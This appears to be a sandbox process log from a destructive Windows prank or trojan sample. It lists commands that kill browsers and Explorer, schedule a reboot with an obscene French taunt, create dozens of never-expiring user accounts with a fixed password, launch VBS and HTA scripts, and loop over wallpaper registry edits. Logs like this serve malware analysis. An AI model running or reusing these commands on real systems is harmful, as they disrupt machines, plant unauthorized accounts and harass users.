taskkill /F /IM brave.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM iexplore.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM explorer.exe

C:\Windows\system32\shutdown.exe

shutdown -r -t 300 -c "Dans 5 minutes tu n'as plus de PC fils de viol, la OGK t'a bien baiser le cul :)"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\23948.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20725.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4235.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\26852.vbs" 28089.bat

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\28089.bat" "

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\net.exe

net user LE bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user LE bitasse /add /expire:never /active:yes

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\risitas.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Users\Admin\AppData\Local\Temp\melter.exe

melter.exe

C:\Windows\system32\net.exe

net user 18-25 bitasse /add /expire:never /active:yes

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 18-25 bitasse /add /expire:never /active:yes

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\net.exe

net user T'A bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user T'A bitasse /add /expire:never /active:yes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\net.exe

net user BIEN bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user BIEN bitasse /add /expire:never /active:yes

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\net.exe

net user D?TRUIT bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user D?TRUIT bitasse /add /expire:never /active:yes

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\net.exe

net user LE bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user LE bitasse /add /expire:never /active:yes

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\net.exe

net user CUL bitasse /add /expire:never /active:yes

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user CUL bitasse /add /expire:never /active:yes

C:\Windows\system32\net.exe

net user ENFANT bitasse /add /expire:never /active:yes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user ENFANT bitasse /add /expire:never /active:yes

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\net.exe

net user DE bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user DE bitasse /add /expire:never /active:yes

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\net.exe

net user SATAN bitasse /add /expire:never /active:yes

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user SATAN bitasse /add /expire:never /active:yes

C:\Windows\system32\net.exe

net user 941488320898 bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 941488320898 bitasse /add /expire:never /active:yes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\net.exe

net user 18849574315444 bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 18849574315444 bitasse /add /expire:never /active:yes

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\net.exe

net user 26022636112598 bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 26022636112598 bitasse /add /expire:never /active:yes

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\net.exe

net user 214902539824108 bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 214902539824108 bitasse /add /expire:never /active:yes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\net.exe

net user 13982042422066 bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 13982042422066 bitasse /add /expire:never /active:yes

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\net.exe

net user 248421527631217 bitasse /add /expire:never /active:yes

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 248421527631217 bitasse /add /expire:never /active:yes

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\net.exe

net user 21904155148759 bitasse /add /expire:never /active:yes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 21904155148759 bitasse /add /expire:never /active:yes

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\net.exe

net user 1840380097177 bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 1840380097177 bitasse /add /expire:never /active:yes

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\net.exe

net user 18524648911123 bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 18524648911123 bitasse /add /expire:never /active:yes

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\net.exe

net user 43871908525489 bitasse /add /expire:never /active:yes

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 43871908525489 bitasse /add /expire:never /active:yes

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\net.exe

net user 314021462413291 bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 314021462413291 bitasse /add /expire:never /active:yes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\net.exe

net user 735291419152 bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 735291419152 bitasse /add /expire:never /active:yes

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\net.exe

net user 64093165125703 bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 64093165125703 bitasse /add /expire:never /active:yes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\net.exe

net user 124422046724511 bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 124422046724511 bitasse /add /expire:never /active:yes

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\net.exe

net user 147862219226991 bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 147862219226991 bitasse /add /expire:never /active:yes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\net.exe

net user 30027172512632 bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 30027172512632 bitasse /add /expire:never /active:yes

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\net.exe

net user 203542707630234 bitasse /add /expire:never /active:yes

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 203542707630234 bitasse /add /expire:never /active:yes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\net.exe

net user 135591157417569 bitasse /add /expire:never /active:yes

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 135591157417569 bitasse /add /expire:never /active:yes

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

